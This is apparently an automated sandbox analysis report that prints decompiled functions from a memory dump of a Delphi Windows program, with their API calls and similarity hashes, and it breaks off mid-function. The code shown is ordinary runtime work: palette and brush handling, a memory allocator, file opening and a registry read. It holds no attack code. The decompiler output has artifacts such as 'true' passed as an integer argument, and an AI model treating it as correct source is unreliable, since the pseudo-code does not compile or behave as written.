Part of subcall function 0042796C: GetObjectA.GDI32(?,00000054), ref: 00427980 CreateCompatibleDC.GDI32(00000000), ref: 00427AE2 SelectPalette.GDI32(?,00000000,00000000), ref: 00427B03 RealizePalette.GDI32(?), ref: 00427B0F GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00427B26 SelectPalette.GDI32(?,00000000,00000000), ref: 00427B4E DeleteDC.GDI32(?), ref: 00427B57

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize String ID: API String ID: 1221726059-0 Opcode ID: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492 Instruction ID: 962af5e7cc7204e74324ac0cd40ad7ab2ef4d8fef8aaa126dedc15750c7fb750 Opcode Fuzzy Hash: 8627611f152e7c7c56902325a297cebd820d38512f5a8e1b8c5b3a113364f492 Instruction Fuzzy Hash: C2118F75B04304BBDB10DBA9CC81F5EBBFCEF49704F5184AAB514E7281D678A9008768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0042730C(void* __eax, signed short __ecx) { char _v1036; signed short _v1038; struct tagRGBQUAD _v1048; short _v1066; void* __ebx; void* _t19; void* _t24; struct HDC__* _t25; void* _t29; void* _t32; struct HPALETTE__* _t34; LOGPALETTE* _t35; _t32 = __eax; _t34 = 0; _t35->palVersion = 0x300; if(__eax == 0) { _v1038 = __ecx; E00402EFC(_t29, _t24, __ecx + __ecx + __ecx + __ecx, &_v1036); } else { _t25 = CreateCompatibleDC(0); _t19 = SelectObject(_t25, _t32); _v1066 = GetDIBColorTable(_t25, 0, 0x100, &_v1048); SelectObject(_t25, _t19); DeleteDC(_t25); } if(_v1038 != 0) { if(_v1038 != 0x10 || E00427274(_t35) == 0) { E00427108( &_v1036, _v1038 & 0x0000ffff); } _t34 = CreatePalette(_t35); } return _t34; } 0x00427315 0x00427317 0x00427319 0x00427321 0x0042735b 0x0042736a 0x00427323 0x0042732a 0x0042732e 0x00427347 0x0042734e 0x00427354 0x00427354 0x00427375 0x0042737d 0x00427393 0x00427393 0x004273a0 0x004273a0 0x004273ad

APIs

CreateCompatibleDC.GDI32(00000000), ref: 00427325 SelectObject.GDI32(00000000,00000000), ref: 0042732E GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00429843,?,?,?,?,00428423), ref: 00427342 SelectObject.GDI32(00000000,00000000), ref: 0042734E DeleteDC.GDI32(00000000), ref: 00427354 CreatePalette.GDI32 ref: 0042739B

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable String ID: API String ID: 2515223848-0 Opcode ID: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92 Instruction ID: 4a95b8b0959ba2db041035c6acb415e503d43549d7c2ca44117eec6569594a82 Opcode Fuzzy Hash: c89457fef7e00606ab67b15f21780a14b5c4b4e76221054ff810e7252926fb92 Instruction Fuzzy Hash: 4501C46130C32062E614B3269C43B6F72F89FC0718F55C82FB989A72C2E67D8804939E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E004269F4(void* __eax) { void* _t36; _t36 = __eax; UnrealizeObject(E004261BC( *((intOrPtr*)(__eax + 0x14)))); SelectObject( *(_t36 + 4), E004261BC( *((intOrPtr*)(_t36 + 0x14)))); if(E0042629C( *((intOrPtr*)(_t36 + 0x14))) != 0) { SetBkColor( *(_t36 + 4), !(E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14)))))); return SetBkMode( *(_t36 + 4), 1); } else { SetBkColor( *(_t36 + 4), E00425400(E00426180( *((intOrPtr*)(_t36 + 0x14))))); return SetBkMode( *(_t36 + 4), "true"); } } 0x004269f5 0x00426a00 0x00426a12 0x00426a21 0x00426a5b 0x00426a6c 0x00426a23 0x00426a35 0x00426a46 0x00426a46

APIs

Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267 UnrealizeObject.GDI32(00000000), ref: 00426A00 SelectObject.GDI32(?,00000000), ref: 00426A12 SetBkColor.GDI32(?,00000000), ref: 00426A35 SetBkMode.GDI32(?,?), ref: 00426A40 SetBkColor.GDI32(?,00000000), ref: 00426A5B SetBkMode.GDI32(?,00000001), ref: 00426A66 Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize String ID: API String ID: 3527656728-0 Opcode ID: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f Instruction ID: 79df315320e9c6d7b3654dfc87e14d29fd340cea2b97e5c1a1a8a26441f2275c Opcode Fuzzy Hash: 7ad58a4a7fab2d505cb020bb7c2f8009f6a27285ca724472cc6bf081660a7e3f Instruction Fuzzy Hash: 98F06BB57001109BDB04FFBAE9C6E1B6BA85F04309755449AB909DF197C939E8208739

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E00401820(signed int __eax) { signed int __ebx; signed int __edi; signed int __esi; intOrPtr* _t99; signed int _t104; signed int _t109; signed int _t110; intOrPtr* _t114; void* _t116; intOrPtr* _t121; signed int _t125; signed int _t129; signed int _t131; signed int _t132; signed int _t133; signed int _t134; signed int _t135; unsigned int _t141; signed int _t142; void* _t144; intOrPtr* _t147; intOrPtr _t148; signed int _t150; long _t156; intOrPtr _t159; signed int _t162; _t129 = *0x46304d; // 0x0 if(__eax > 0xa2c) { __eflags = __eax - 0x40a2c; if(__eax > 0x40a2c) { _pop(_t120); __eflags = __eax; if(__eax >= 0) { _push(_t120); _t162 = __eax; _t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; _t121 = VirtualAlloc(0, _t156, 0x101000, 4); if(_t121 != 0) { _t147 = _t121; *((intOrPtr*)(_t147 + 8)) = _t162; *(_t147 + 0xc) = _t156 | 0x00000004; E00401740(); _t99 = *0x4657b0; // 0x4657ac *_t147 = 0x4657ac; *0x4657b0 = _t121; *((intOrPtr*)(_t147 + 4)) = _t99; *_t99 = _t121; *0x4657a8 = 0; _t121 = _t121 + 0x10; } return _t121; } else { __eflags = 0; return 0; } } else { _t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; __eflags = _t129; if(__eflags != 0) { while(1) { asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L39; } Sleep(0); asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L39; } } L39: _t141 = _t125 - 0xb30; _t142 = _t141 >> 0xd; _t131 = _t141 >> 8; _t104 = 0xffffffff << _t131 & *(0x463728 + _t142 * 4); __eflags = 0xffffffff; if(0xffffffff == 0) { _t132 = _t142; __eflags = 0xfffffffe << _t132 & *0x463724; if((0xfffffffe << _t132 & *0x463724) == 0) { _t133 = *0x463720; // 0x3a290 _t134 = _t133 - _t125; __eflags = _t134; if(_t134 < 0) { _t109 = E004016C8(_t125); } else { _t110 = *0x46371c; // 0x261a2a0 _t109 = _t110 - _t125; *0x46371c = _t109; *0x463720 = _t134; *(_t109 - 4) = _t125 | 0x00000002; } *0x463718 = 0; return _t109; } else { asm("bsf edx, eax"); asm("bsf ecx, eax"); _t135 = _t132 | _t142 << 0x00000005; goto L47; } } else { asm("bsf eax, eax"); _t135 = _t131 & 0xffffffe0 | _t104; L47: _push(_t152); _push(_t145); _t148 = 0x4637a8 + _t135 * 8; _t159 = *((intOrPtr*)(_t148 + 4)); _t114 = *((intOrPtr*)(_t159 + 4)); *((intOrPtr*)(_t148 + 4)) = _t114; *_t114 = _t148; __eflags = _t148 - _t114; if(_t148 == _t114) { asm("rol eax, cl"); _t80 = 0x463728 + _t142 * 4; *_t80 = *(0x463728 + _t142 * 4) & 0xfffffffe; __eflags = *_t80; if( *_t80 == 0) { asm("btr [0x463724], edx"); } } _t150 = 0xfffffff0 & *(_t159 - 4); _t144 = 0xfffffff0 - _t125; __eflags = 0xfffffff0; if(0xfffffff0 == 0) { _t89 = &((_t159 - 4)[0xfffffffffffffffc]); *_t89 = *(_t159 - 4 + _t150) & 0x000000f7; __eflags = *_t89; } else { _t116 = _t125 + _t159; *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; *(0xfffffff0 + _t116 - 8) = 0xfffffff0; __eflags = 0xfffffff0 - 0xb30; if(0xfffffff0 >= 0xb30) { E004015FC(_t116, 0xfffffffffffffff3, _t144); } } *(_t159 - 4) = _t125 + 2; *0x463718 = 0; return _t159; } } } else { __eflags = __cl; __eax = *(__edx + 0x4635c0) & 0x000000ff; __ebx = 0x46103c + ( *(__edx + 0x4635c0) & 0x000000ff) * 8; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags == 0) { goto L5; } __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx - 0x40; __eflags = __ebx; Sleep(0); __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags != 0) { Sleep(0xa); continue; } } } goto L5; } } L5: __edx = *(__ebx + 4); __eax = *(__edx + 8); __ecx = 0xfffffff8; __eflags = __edx - __ebx; if(__edx == __ebx) { __edx = *(__ebx + 0x10); __ecx = *(__ebx + 2) & 0x0000ffff; __ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; __eflags = __eax - *(__ebx + 0xc); if(__eax > *(__ebx + 0xc)) { _push(__esi); _push(__edi); __eflags = *0x46304d; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags == 0) { goto L20; } Sleep(0); __eax = 0x100; asm("lock cmpxchg [0x463718], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L20; } } L20: *(__ebx + 1) = *(__ebx + 1) & *0x463724; __eflags = *(__ebx + 1) & *0x463724; if(( *(__ebx + 1) & *0x463724) == 0) { __ecx = *(__ebx + 0x18) & 0x0000ffff; __edi = *0x463720; // 0x3a290 __eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { __eax = *(__ebx + 0x1a) & 0x0000ffff; __edi = __eax; __eax = E004016C8(__eax); __esi = __eax; __eflags = __eax; if(__eax != 0) { goto L33; } else { *0x463718 = __al; *__ebx = __al; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { __esi = *0x46371c; // 0x261a2a0 __ecx = *(__ebx + 0x1a) & 0x0000ffff; __edx = __ecx + 0xb30; __eflags = __edi - __ecx + 0xb30; if(__edi >= __ecx + 0xb30) { __edi = __ecx; } __esi = __esi - __edi; *0x463720 = *0x463720 - __edi; *0x46371c = __esi; goto L33; } } else { asm("bsf eax, esi"); __esi = __eax * 8; __ecx = *(0x463728 + __eax * 4); asm("bsf ecx, ecx"); __ecx = *(0x463728 + __eax * 4) + __eax * 8 * 4; __edi = 0x4637a8 + ( *(0x463728 + __eax * 4) + __eax * 8 * 4) * 8; __esi = *(__edi + 4); __edx = *(__esi + 4); *(__edi + 4) = __edx; *__edx = __edi; __eflags = __edi - __edx; if(__edi == __edx) { __edx = 0xfffffffe; asm("rol edx, cl"); _t38 = 0x463728 + __eax * 4; *_t38 = *(0x463728 + __eax * 4) & 0xfffffffe; __eflags = *_t38; if( *_t38 == 0) { asm("btr [0x463724], eax"); } } __edi = 0xfffffff0; __edi = 0xfffffff0 & *(__esi - 4); __eflags = 0xfffffff0 - 0x10a60; if(0xfffffff0 < 0x10a60) { _t52 = &((__esi - 4)[0xfffffffffffffffc]); *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; __eflags = *_t52; } else { __edx = __edi; __edi = *(__ebx + 0x1a) & 0x0000ffff; __edx = __edx - __edi; __eax = __edi + __esi; __ecx = __edx + 3; *(__eax - 4) = __ecx; *(__edx + __eax - 8) = __edx; __eax = E004015FC(__eax, __ecx, __edx); } L33: _t56 = __edi + 6; // 0x3a296 __ecx = _t56; *(__esi - 4) = _t56; __eax = 0; *0x463718 = __al; *__esi = __ebx; *((intOrPtr*)(__esi + 8)) = 0; *((intOrPtr*)(__esi + 0xc)) = 1; *(__ebx + 0x10) = __esi; _t61 = __esi + 0x20; // 0x261a2c0 __eax = _t61; __ecx = *(__ebx + 2) & 0x0000ffff; __edx = __ecx + __eax; *(__ebx + 8) = __ecx + __eax; __edi = __edi + __esi; __edi = __edi - __ecx; __eflags = __edi; *(__ebx + 0xc) = __edi; *__ebx = 0; *(__eax - 4) = __esi; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { _t19 = __edx + 0xc; *_t19 = *(__edx + 0xc) + 1; __eflags = *_t19; *(__ebx + 8) = __ecx; *__ebx = 0; *(__eax - 4) = __edx; _pop(__ebx); return __eax; } } else { *(__edx + 0xc) = *(__edx + 0xc) + 1; __ecx = 0xfffffff8 & *(__eax - 4); __eflags = 0xfffffff8; *(__edx + 8) = 0xfffffff8 & *(__eax - 4); *(__eax - 4) = __edx; if(0xfffffff8 == 0) { __ecx = *(__edx + 4); *(__ecx + 0x14) = __ebx; *(__ebx + 4) = __ecx; *__ebx = 0; _pop(__ebx); return __eax; } else { *__ebx = 0; _pop(__ebx); return __eax; } } } } 0x0040182c 0x00401832 0x00401a64 0x00401a69 0x00401b7c 0x00401b7d 0x00401b7f 0x00401780 0x00401784 0x00401790 0x004017a5 0x004017a9 0x004017ab 0x004017ad 0x004017b3 0x004017b6 0x004017bb 0x004017c0 0x004017c6 0x004017cc 0x004017cf 0x004017d1 0x004017d8 0x004017d8 0x004017e1 0x00401b85 0x00401b85 0x00401b87 0x00401b87 0x00401a6f 0x00401a7b 0x00401a7e 0x00401a80 0x00401a34 0x00401a39 0x00401a41 0x00000000 0x00000000 0x00401a45 0x00401a4f 0x00401a57 0x00401a5b 0x00000000 0x00401a5b 0x00000000 0x00401a57 0x00401a34 0x00401a82 0x00401a82 0x00401a8a 0x00401a8d 0x00401a97 0x00401a97 0x00401a9e 0x00401ab1 0x00401ab5 0x00401abb 0x00401ad4 0x00401ada 0x00401ada 0x00401adc 0x00401afa 0x00401ade 0x00401ade 0x00401ae3 0x00401ae5 0x00401aea 0x00401af3 0x00401af3 0x00401aff 0x00401b07 0x00401abd 0x00401abd 0x00401ac7 0x00401acf 0x00000000 0x00401acf 0x00401aa0 0x00401aa3 0x00401aa6 0x00401b08 0x00401b08 0x00401b09 0x00401b0a 0x00401b11 0x00401b14 0x00401b17 0x00401b1a 0x00401b1c 0x00401b1e 0x00401b25 0x00401b27 0x00401b27 0x00401b27 0x00401b2e 0x00401b30 0x00401b30 0x00401b2e 0x00401b3c 0x00401b41 0x00401b41 0x00401b43 0x00401b64 0x00401b64 0x00401b64 0x00401b45 0x00401b45 0x00401b4b 0x00401b4e 0x00401b52 0x00401b58 0x00401b5a 0x00401b5a 0x00401b58 0x00401b6c 0x00401b6f 0x00401b7b 0x00401b7b 0x00401a9e 0x00401838 0x00401838 0x0040183a 0x00401841 0x00401848 0x004018a0 0x004018a0 0x004018a5 0x004018a9 0x00000000 0x00000000 0x004018ab 0x004018ab 0x004018ae 0x004018b3 0x004018b7 0x004018b9 0x004018b9 0x004018bc 0x004018c1 0x004018c5 0x004018c7 0x004018c7 0x004018cc 0x004018d1 0x004018d6 0x004018da 0x004018e2 0x00000000 0x004018e2 0x004018da 0x004018c5 0x00000000 0x004018b7 0x004018a0 0x0040184a 0x0040184a 0x0040184d 0x00401850 0x00401855 0x00401857 0x00401870 0x00401873 0x00401877 0x00401879 0x0040187c 0x004018ec 0x004018ed 0x004018ee 0x004018f5 0x004018f7 0x004018f7 0x004018fc 0x00401904 0x00000000 0x00000000 0x00401908 0x0040190d 0x00401912 0x0040191a 0x0040191e 0x00000000 0x0040191e 0x00000000 0x0040191a 0x004018f7 0x00401928 0x0040192c 0x0040192c 0x00401932 0x004019a4 0x004019a8 0x004019ae 0x004019b0 0x004019d8 0x004019dc 0x004019de 0x004019e3 0x004019e5 0x004019e7 0x00000000 0x004019e9 0x004019e9 0x004019ee 0x004019f0 0x004019f1 0x004019f2 0x004019f3 0x004019f3 0x004019b2 0x004019b2 0x004019b8 0x004019bc 0x004019c2 0x004019c4 0x004019c6 0x004019c6 0x004019c8 0x004019ca 0x004019d0 0x00000000 0x004019d0 0x00401934 0x00401934 0x00401937 0x0040193e 0x00401945 0x00401948 0x0040194b 0x00401952 0x00401955 0x00401958 0x0040195b 0x0040195d 0x0040195f 0x00401961 0x00401966 0x00401968 0x00401968 0x00401968 0x0040196f 0x00401971 0x00401971 0x0040196f 0x00401978 0x0040197d 0x00401980 0x00401986 0x004019f4 0x004019f4 0x004019f4 0x00401988 0x00401988 0x0040198a 0x0040198e 0x00401990 0x00401993 0x00401996 0x00401999 0x0040199d 0x0040199d 0x004019f9 0x004019f9 0x004019f9 0x004019fc 0x004019ff 0x00401a01 0x00401a06 0x00401a08 0x00401a0b 0x00401a12 0x00401a15 0x00401a15 0x00401a18 0x00401a1c 0x00401a1f 0x00401a22 0x00401a24 0x00401a24 0x00401a26 0x00401a29 0x00401a2c 0x00401a2f 0x00401a30 0x00401a31 0x00401a32 0x00401a32 0x0040187e 0x0040187e 0x0040187e 0x0040187e 0x00401882 0x00401885 0x00401888 0x0040188b 0x0040188c 0x0040188c 0x00401859 0x00401859 0x0040185d 0x0040185d 0x00401860 0x00401863 0x00401866 0x00401890 0x00401893 0x00401896 0x00401899 0x0040189c 0x0040189d 0x00401868 0x00401868 0x0040186b 0x0040186c 0x0040186c 0x00401866 0x00401857

APIs

Sleep.KERNEL32(00000000,?,004020BD), ref: 004018CC Sleep.KERNEL32(0000000A,00000000,?,004020BD), ref: 004018E2

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep String ID: API String ID: 3472027048-0 Opcode ID: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2 Instruction ID: 152e54be863095814fc9e312b9aeabec1b522ad23c6b77915a881c1f34c1aab1 Opcode Fuzzy Hash: 13f8b92783284f0742b16d58920b8a109701e01874c564de7aff31f642965eb2 Instruction Fuzzy Hash: 4DB139F26012919FC715CF29D880316BBE0EB85312F18C27FE4459B3E5E7B89A41CB99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E0041CB80(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, signed short _a8) { char _v5; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; void* _t29; void* _t65; void* _t66; intOrPtr _t70; intOrPtr _t72; char _t73; intOrPtr _t77; void* _t89; void* _t91; void* _t92; intOrPtr _t93; _t73 = __edx; _t66 = __ecx; _t91 = _t92; _t93 = _t92 + 0xffffffdc; _v36 = 0; _v40 = 0; _v28 = 0; _v32 = 0; if(__edx != 0) { _t93 = _t93 + 0xfffffff0; _t29 = E00403C34(_t29, _t91); } _t89 = _t66; _v5 = _t73; _t65 = _t29; _t87 = _a8; _push(_t91); _push(0x41ccc8); _push( *[fs:eax]); *[fs:eax] = _t93; if(_a8 != 0xffff) { E0041CA78(E00408D98(_t89, _t87 & 0x0000ffff), 0); if( *((intOrPtr*)(_t65 + 4)) < 0) { E00408F58(_t89, &_v36); _v24 = _v36; _v20 = 0xb; E0040B908(GetLastError(), &_v40); _v16 = _v40; _v12 = 0xb; _t70 = *0x462ac0; // 0x416140 E0040C214(_t65, _t70, 1, _t87, _t89, 1, &_v24); E00404184(); } } else { E0041CA78(CreateFileA(E00404C00(_t89), 0xc0000000, 0, 0, "true", 0x80, 0), 0); if( *((intOrPtr*)(_t65 + 4)) < 0) { E00408F58(_t89, &_v28); _v24 = _v28; _v20 = 0xb; E0040B908(GetLastError(), &_v32); _v16 = _v32; _v12 = 0xb; _t72 = *0x462f34; // 0x416138 E0040C214(_t65, _t72, 1, _t87, _t89, 1, &_v24); E00404184(); } } _t27 = _t65 + 8; // 0x418ad8 E00404790(_t27, _t89); _pop(_t77); *[fs:eax] = _t77; _push(E0041CCCF); return E00404760( &_v40, 4); } 0x0041cb80 0x0041cb80 0x0041cb81 0x0041cb83 0x0041cb8b 0x0041cb8e 0x0041cb91 0x0041cb94 0x0041cb99 0x0041cb9b 0x0041cb9e 0x0041cb9e 0x0041cba3 0x0041cba5 0x0041cba8 0x0041cbaa 0x0041cbaf 0x0041cbb0 0x0041cbb5 0x0041cbb8 0x0041cbc0 0x0041cc50 0x0041cc59 0x0041cc60 0x0041cc68 0x0041cc6b 0x0041cc77 0x0041cc7f 0x0041cc82 0x0041cc8c 0x0041cc99 0x0041cc9e 0x0041cc9e 0x0041cbc2 0x0041cbe7 0x0041cbf0 0x0041cbfb 0x0041cc03 0x0041cc06 0x0041cc12 0x0041cc1a 0x0041cc1d 0x0041cc27 0x0041cc34 0x0041cc39 0x0041cc39 0x0041cbf0 0x0041cca3 0x0041cca8 0x0041ccaf 0x0041ccb2 0x0041ccb5 0x0041ccc7

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CBDC GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC0A Part of subcall function 00408D98: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00418AD0,0041CC4A,00000000,0041CCC8,?,?,00418AD0), ref: 00408DE6 Part of subcall function 00408F58: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00418AD0,0041CC65,00000000,0041CCC8,?,?,00418AD0,00000001), ref: 00408F77 GetLastError.KERNEL32(00000000,0041CCC8,?,?,00418AD0,00000001), ref: 0041CC6F Part of subcall function 0040B908: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000), ref: 0040B927

Strings

8aA , xrefs: 0041CC27 @aA , xrefs: 0041CC8C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath String ID: 8aA$@aA API String ID: 503785936-2183923460 Opcode ID: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb Instruction ID: 81cf5405ad412fc3c3ed94fa8eb2254e93a3cb41c3525e5490fe9ad35a09f5bb Opcode Fuzzy Hash: 74cf7b3b09367aa19a362bd8889190725437025edc70dae0b50c2eeb363540cb Instruction Fuzzy Hash: 4B31D670A002089FDB00EBA5CD827DEBBF5AB49304F50807EE504B73C1D7799D048BA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 63%

E00403728() { void* _v8; char _v12; int _v16; signed short _t14; intOrPtr _t27; void* _t29; void* _t31; intOrPtr _t32; _t29 = _t31; _t32 = _t31 + 0xfffffff4; _v12 = *0x461020 & 0x0000ffff; if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1, &_v8) != 0) { _t14 = *0x461020 & 0xffc0 | _v12 & 0x3f; *0x461020 = _t14; return _t14; } else { _push(_t29); _push(E00403799); _push( *[fs:eax]); *[fs:eax] = _t32; _v16 = 4; RegQueryValueExA(_v8, "FPUMaskValue", 0, 0, &_v12, &_v16); _pop(_t27); *[fs:eax] = _t27; _push(0x4037a0); return RegCloseKey(_v8); } } 0x00403729 0x0040372b 0x00403735 0x00403751 0x004037b3 0x004037b6 0x004037bf 0x00403753 0x00403755 0x00403756 0x0040375b 0x0040375e 0x00403761 0x0040377d 0x00403784 0x00403787 0x0040378a 0x00403798 0x00403798

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040374A RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040377D RegCloseKey.ADVAPI32(?,004037A0,00000000,?,00000004,00000000,00403799,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403793

Strings

SOFTWARE\Borland\Delphi\RTL , xrefs: 00403740 FPUMaskValue , xrefs: 00403774

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL API String ID: 3677997916-4173385793 Opcode ID: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e Instruction ID: 905e6c10af62dac64c3e9582eb7401ad952ea0fe5c189a7c1f175b7203d1f33b Opcode Fuzzy Hash: 6e38f76dad574c301ae7063cc0567989a2d3d7df9236b8b50364baff86729d8e Instruction Fuzzy Hash: C701B5B9914348BAEB11DF918C42BB977BCEB48B01F104477F904F79D0E6789A10C65D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E0044E9D8(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr* _v8; int _t103; int _t105; intOrPtr _t122; int _t127; intOrPtr _t163; signed char _t172; void* _t174; intOrPtr _t192; intOrPtr _t205; void* _t208; void* _t210; int _t211; intOrPtr _t215; void* _t217; signed char _t218; _t208 = __edi; _t175 = __ecx; _t214 = _t215; _push(__ecx); _t210 = __edx; _v8 = __eax; E0043E310(_v8); _push(_t215); _push(0x44ec56); _push( *[fs:edx]); *[fs:edx] = _t215; *(_v8 + 0x2b0) = 0; *(_v8 + 0x2b4) = 0; *(_v8 + 0x2b8) = 0; _t174 = 0; _t217 = E004038B4( *_v8) - *0x44b604; // 0x44b650 if(_t217 == 0) { _t172 = *0x4657f5 & 0x000000ff ^ 0x00000001; _t218 = _t172; *(_v8 + 0x27c) = _t172; } E0043D938(_v8, _t174, _t175, _t210, _t218); if( *(_v8 + 0x2a4) == 0 || *(_v8 + 0x2b8) <= 0) { L14: _t103 = *(_v8 + 0x2b0); _t227 = _t103; if(_t103 > 0) { E0043A3B0(_v8, _t103, _t227); } _t105 = *(_v8 + 0x2b4); _t228 = _t105; if(_t105 > 0) { E0043A3F4(_v8, _t105, _t228); } *(_v8 + 0x8c) = *0x44ec64 & 0x000000ff; _t229 = _t174; if(_t174 == 0) { L0044DFB0(_v8, 1, 1); L00441EB0(_v8, 1, 1, _t229); } E0043BC9C(_v8, 0, 0xb03d, 0); _pop(_t192); *[fs:eax] = _t192; _push(0x44ec5d); return E0043E318(_v8); } else { if(( *(_v8 + 0x8c) & 0x00000010) != 0) { _t205 = *0x466584; // 0x26e66a0 if( *(_v8 + 0x2a4) != *((intOrPtr*)(_t205 + 0x40))) { _t163 = *0x466584; // 0x26e66a0 E00425B74( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00425B6C( *((intOrPtr*)(_v8 + 0x68))), *(_t163 + 0x40), *(_v8 + 0x2a4)), _t208, _t214); } } _t122 = *0x466584; // 0x26e66a0 *(_v8 + 0x2a4) = *(_t122 + 0x40); _t211 = E0044EDC4(_v8); _t127 = *(_v8 + 0x2b8); _t223 = _t211 - _t127; if(_t211 != _t127) { _t174 = 1; L0044DFB0(_v8, _t127, _t211); E0043A4D8(_v8, *(_v8 + 0x2b8), _t211); L00441EB0(_v8, *(_v8 + 